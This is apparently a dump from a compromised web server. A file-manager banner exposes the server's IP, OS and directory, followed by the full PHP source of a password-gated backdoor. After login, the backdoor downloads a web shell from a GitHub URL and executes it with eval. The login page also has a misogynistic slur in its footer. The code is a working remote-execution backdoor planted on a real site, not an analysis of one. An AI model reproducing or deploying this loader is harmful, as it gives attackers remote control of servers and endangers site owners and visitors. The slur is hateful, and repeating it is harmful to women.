Server IP : 103.6.199.200 / Your IP : 18.191.162.73 Web Server : Microsoft-IIS/10.0 System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586 User : EMPUSA$ ( 0) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Domains/trisecne/trisecnet.com/wwwroot/ |
Upload File : |
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['log']) && $_POST['log'] === 'login' && isset($_POST['username']) && isset($_POST['password'])) { // Validate username and password here // Example validation (replace with your actual validation logic) $entered_username = $_POST['username']; $entered_password = $_POST['password']; $hashed_password = 'ddc7e0f8f892c73136b307ced3c78c7b'; // Replace this with your MD5 hashed password if ($entered_username === 'JARANGGOYANG' && md5($entered_password) === $hashed_password) { // Username and password are correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Username or password is incorrect echo "<p class='error'>Incorrect username or password. Please try again.</p>"; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://raw.githubusercontent.com/MadExploits/Gecko/main/gecko-new.php'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LOGIN 303</title> <link href="https://fonts.googleapis.com/css2?family=Creepster&family=Caveat+Brush&display=swap" rel="stylesheet"> <link rel="shortcut icon" href="https://www.iprodha.misiones.gov.ar/sim/html/b4nditmana.jpg" type="image/x-icon"> <style> :root { --text-color: #fff; --text-red: rgb(255, 0, 0); --box-color: #202e62; --unactive: rgb(98, 98, 98); } * { margin: 0; padding: 0; } html { height: 100vh; width: 100%; } body { overflow: hidden; background-image: url(https://www.iprodha.misiones.gov.ar/sim/html/b4nditmana.jpg); background-color: black; background-size: cover; background-repeat: no-repeat; align-items: center; } .login-form { height: 100vh; width: 100%; position: inherit; box-sizing: border-box; display: flex; justify-content: center; align-items: center; flex-direction: column; } .logo { font-family: 'Creepster', cursive; color: var(--text-color); font-size: 50px; } .logo span { color: var(--text-red); } .login-box { width: 300px; background-color: var(--box-color); padding: 40px; margin-top: 10px; border-radius: 15px; box-shadow: 0px 3px 3px 0px rgba(0, 0, 0, 0.12), 0px 3px 6px 0px rgba(0, 0, 0, 0.22), 0px 5px 10px 0px rgba(0, 0, 0, 0.2), 0px 8px 12px 1px rgba(0, 0, 0, 0.19); display: flex; flex-direction: column; justify-content: center; align-items: center; } .login-box input { margin-top: 20px; border-radius: 5px; padding: 10px; border: 1px solid var(--unactive); background-color: var(--box-color); outline: none; color: var(--text-color); } .login-box .inputBox { position: relative; width: 100%; display: flex; flex-direction: column; } .inputBox span { color: var(--unactive); top: 20px; position: absolute; padding: 10px; pointer-events: none; transition: 300ms; } .login-box input:valid~span, .login-box input:focus~span { color: var(--text-color); transform: translateX(10px) translateY(-7px); font-size: 0.8em; padding: 0 10px; background: var(--box-color); } .submit { display: flex; justify-content: center; } .error { color: var(--text-red); } .quote { color: var(--text-color); font-family: 'Caveat Brush'; font-size: 25px; } .copyright { display: flex; justify-content: center; margin: 10px; font-family: 'caveat Brush'; color: var(--text-color); font-size: 20px; } .hidden { visibility: hidden; } @media only screen and (max-width: 480px) { body { background-image: url(https://www.iprodha.misiones.gov.ar/sim/html/b4nditmana.jpg); } .login-box { width: calc(100vw - 100px); } .quote { font-size: 20px; } } </style> </head> <body> <div class="login-form"> <h1 class="logo">Korban<span> Lady Companion!!!</span></h1> <div class="login-box"> <?php if (isset($error_message)) { echo "<p class='error'>$error_message</p>"; } ?> <p class="quote">SEMER MESEM TIME</p> <form method="post"> <input type="hidden" name="log" value="login"> <div class="inputBox"> <input type="text" name="username" required> <span>Username</span> </div> <div class="inputBox"> <input type="password" name="password" required> <span>Password</span> </div> <div class="submit"> <input type="submit" value="Login"> </div> </form> </div> <div class="copyright"><span>© SEMERMESEM FUCK YOU WOMEN</span></div> </div> </body> </html> <?php } ?>